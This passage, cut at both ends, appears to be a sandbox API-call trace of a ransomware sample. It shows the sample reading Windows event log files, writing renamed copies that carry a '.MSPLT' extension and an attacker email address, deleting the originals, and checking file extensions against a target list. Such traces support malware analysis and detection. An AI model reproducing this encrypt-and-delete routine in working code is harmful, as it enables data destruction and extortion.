dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0286.649] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0286.649] CloseHandle (hObject=0x3f4) returned 1 [0286.649] GetFileAttributesW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx")) returned 0x20 [0286.649] GetFileAttributesW (lpFileName="C:\\Logs\\Internet Explorer.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\internet explorer.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.649] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0286.650] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0286.650] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0286.650] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\internet explorer.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0286.654] GetLastError () returned 0x0 [0286.654] ReadFile (in: hFile=0x3f4, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0286.773] WriteFile (in: hFile=0x430, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0286.776] ReadFile (in: hFile=0x3f4, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0286.776] WriteFile (in: hFile=0x430, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x100, lpOverlapped=0x0) returned 1 [0286.776] SetEndOfFile (hFile=0x430) returned 1 [0286.812] CloseHandle (hObject=0x430) returned 1 [0286.926] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0286.927] SetEndOfFile (hFile=0x3f4) returned 1 [0286.932] CloseHandle (hObject=0x3f4) returned 1 [0286.932] SetFileAttributesW (lpFileName="C:\\Logs\\Internet Explorer.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0286.933] DeleteFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx")) returned 1 [0287.490] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.490] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.490] lstrlenW (lpString=".doc") returned 4 [0287.490] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0287.490] lstrlenW (lpString=".docx") returned 5 [0287.490] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0287.490] lstrlenW (lpString=".pdf") returned 4 [0287.490] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0287.490] lstrlenW (lpString=".xls") returned 4 [0287.490] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0287.490] lstrlenW (lpString=".xlsx") returned 5 [0287.490] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0287.490] lstrlenW (lpString=".ppt") returned 4 [0287.490] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0287.491] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.491] lstrlenW (lpString=".zip") returned 4 [0287.491] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0287.491] lstrlenW (lpString=".rar") returned 4 [0287.491] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0287.491] lstrlenW (lpString=".bz2") returned 4 [0287.491] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0287.491] lstrlenW (lpString=".7z") returned 3 [0287.491] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0287.491] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.491] lstrlenW (lpString=".dbf") returned 4 [0287.491] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0287.491] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.491] lstrlenW (lpString=".1cd") returned 4 [0287.491] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0287.491] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.491] lstrlenW (lpString=".jpg") returned 4 [0287.491] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0287.491] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.491] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.491] lstrlenW (lpString=".doc") returned 4 [0287.491] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0287.491] lstrlenW (lpString=".docx") returned 5 [0287.491] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0287.491] lstrlenW (lpString=".pdf") returned 4 [0287.491] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0287.491] lstrlenW (lpString=".xls") returned 4 [0287.491] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0287.491] lstrlenW (lpString=".xlsx") returned 5 [0287.492] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0287.492] lstrlenW (lpString=".ppt") returned 4 [0287.492] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0287.492] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.492] lstrlenW (lpString=".zip") returned 4 [0287.492] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0287.492] lstrlenW (lpString=".rar") returned 4 [0287.492] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0287.492] lstrlenW (lpString=".bz2") returned 4 [0287.492] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0287.492] lstrlenW (lpString=".7z") returned 3 [0287.492] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0287.492] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.492] lstrlenW (lpString=".dbf") returned 4 [0287.492] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0287.492] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.492] lstrlenW (lpString=".1cd") returned 4 [0287.492] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0287.492] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0287.492] lstrlenW (lpString=".jpg") returned 4 [0287.492] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0287.492] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0287.492] lstrlenW (lpString="Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 45 [0287.492] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0287.567] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0287.567] CloseHandle (hObject=0x430) returned 1 [0287.568] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx")) returned 0x20 [0287.568] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.568] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0287.568] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.568] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.568] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0287.569] GetLastError () returned 0x0 [0287.569] ReadFile (in: hFile=0x430, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0287.683] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0287.687] ReadFile (in: hFile=0x430, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0287.687] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x12e, lpOverlapped=0x0) returned 1 [0287.687] SetEndOfFile (hFile=0x438) returned 1 [0287.688] CloseHandle (hObject=0x438) returned 1 [0287.690] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.691] SetEndOfFile (hFile=0x430) returned 1 [0287.693] CloseHandle (hObject=0x430) returned 1 [0287.693] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0287.693] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx")) returned 1 [0287.694] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.694] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.694] lstrlenW (lpString=".doc") returned 4 [0287.694] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0287.694] lstrlenW (lpString=".docx") returned 5 [0287.694] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0287.694] lstrlenW (lpString=".pdf") returned 4 [0287.694] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0287.694] lstrlenW (lpString=".xls") returned 4 [0287.694] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0287.694] lstrlenW (lpString=".xlsx") returned 5 [0287.694] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0287.694] lstrlenW (lpString=".ppt") returned 4 [0287.695] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0287.695] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.695] lstrlenW (lpString=".zip") returned 4 [0287.695] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0287.695] lstrlenW (lpString=".rar") returned 4 [0287.695] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0287.695] lstrlenW (lpString=".bz2") returned 4 [0287.695] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0287.695] lstrlenW (lpString=".7z") returned 3 [0287.695] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0287.695] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.695] lstrlenW (lpString=".dbf") returned 4 [0287.695] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0287.695] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.695] lstrlenW (lpString=".1cd") returned 4 [0287.695] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0287.695] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.695] lstrlenW (lpString=".jpg") returned 4 [0287.695] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0287.695] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.695] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.695] lstrlenW (lpString=".doc") returned 4 [0287.695] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0287.696] lstrlenW (lpString=".docx") returned 5 [0287.696] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0287.696] lstrlenW (lpString=".pdf") returned 4 [0287.696] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0287.696] lstrlenW (lpString=".xls") returned 4 [0287.696] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0287.696] lstrlenW (lpString=".xlsx") returned 5 [0287.696] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0287.696] lstrlenW (lpString=".ppt") returned 4 [0287.696] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0287.696] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.696] lstrlenW (lpString=".zip") returned 4 [0287.696] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0287.696] lstrlenW (lpString=".rar") returned 4 [0287.696] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0287.696] lstrlenW (lpString=".bz2") returned 4 [0287.696] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0287.696] lstrlenW (lpString=".7z") returned 3 [0287.696] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0287.696] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.696] lstrlenW (lpString=".dbf") returned 4 [0287.696] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0287.696] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.696] lstrlenW (lpString=".1cd") returned 4 [0287.696] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0287.696] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 53 [0287.696] lstrlenW (lpString=".jpg") returned 4 [0287.696] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0287.697] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0287.697] lstrlenW (lpString="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 57 [0287.697] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0287.697] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0287.697] CloseHandle (hObject=0x430) returned 1 [0287.698] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx")) returned 0x20 [0287.698] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.698] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0287.698] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.698] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.698] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0287.701] GetLastError () returned 0x0 [0287.701] ReadFile (in: hFile=0x430, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0287.747] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0287.750] ReadFile (in: hFile=0x430, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0287.750] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x146, lpOverlapped=0x0) returned 1 [0287.750] SetEndOfFile (hFile=0x438) returned 1 [0288.123] CloseHandle (hObject=0x438) returned 1 [0288.158] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.159] SetEndOfFile (hFile=0x430) returned 1 [0288.180] CloseHandle (hObject=0x430) returned 1 [0288.180] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.180] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx")) returned 1 [0288.222] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.222] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.222] lstrlenW (lpString=".doc") returned 4 [0288.222] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.222] lstrlenW (lpString=".docx") returned 5 [0288.222] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.222] lstrlenW (lpString=".pdf") returned 4 [0288.222] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.222] lstrlenW (lpString=".xls") returned 4 [0288.222] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.222] lstrlenW (lpString=".xlsx") returned 5 [0288.222] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.222] lstrlenW (lpString=".ppt") returned 4 [0288.222] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.222] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.222] lstrlenW (lpString=".zip") returned 4 [0288.222] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.222] lstrlenW (lpString=".rar") returned 4 [0288.222] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.222] lstrlenW (lpString=".bz2") returned 4 [0288.222] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.222] lstrlenW (lpString=".7z") returned 3 [0288.222] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.222] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.222] lstrlenW (lpString=".dbf") returned 4 [0288.222] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.222] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.223] lstrlenW (lpString=".1cd") returned 4 [0288.223] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.223] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.223] lstrlenW (lpString=".jpg") returned 4 [0288.223] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.223] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.223] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.223] lstrlenW (lpString=".doc") returned 4 [0288.223] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.223] lstrlenW (lpString=".docx") returned 5 [0288.223] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.223] lstrlenW (lpString=".pdf") returned 4 [0288.223] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.223] lstrlenW (lpString=".xls") returned 4 [0288.223] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.223] lstrlenW (lpString=".xlsx") returned 5 [0288.223] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.223] lstrlenW (lpString=".ppt") returned 4 [0288.223] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.223] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.223] lstrlenW (lpString=".zip") returned 4 [0288.223] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.223] lstrlenW (lpString=".rar") returned 4 [0288.223] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.223] lstrlenW (lpString=".bz2") returned 4 [0288.224] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.224] lstrlenW (lpString=".7z") returned 3 [0288.224] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.224] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.224] lstrlenW (lpString=".dbf") returned 4 [0288.224] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.224] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.224] lstrlenW (lpString=".1cd") returned 4 [0288.224] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.224] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0288.224] lstrlenW (lpString=".jpg") returned 4 [0288.224] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.224] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.224] lstrlenW (lpString="Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 50 [0288.224] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0288.295] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0288.295] CloseHandle (hObject=0x420) returned 1 [0288.295] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx")) returned 0x20 [0288.296] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.296] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0288.296] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.296] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.296] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0288.304] GetLastError () returned 0x0 [0288.304] ReadFile (in: hFile=0x420, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0288.310] WriteFile (in: hFile=0x3d0, 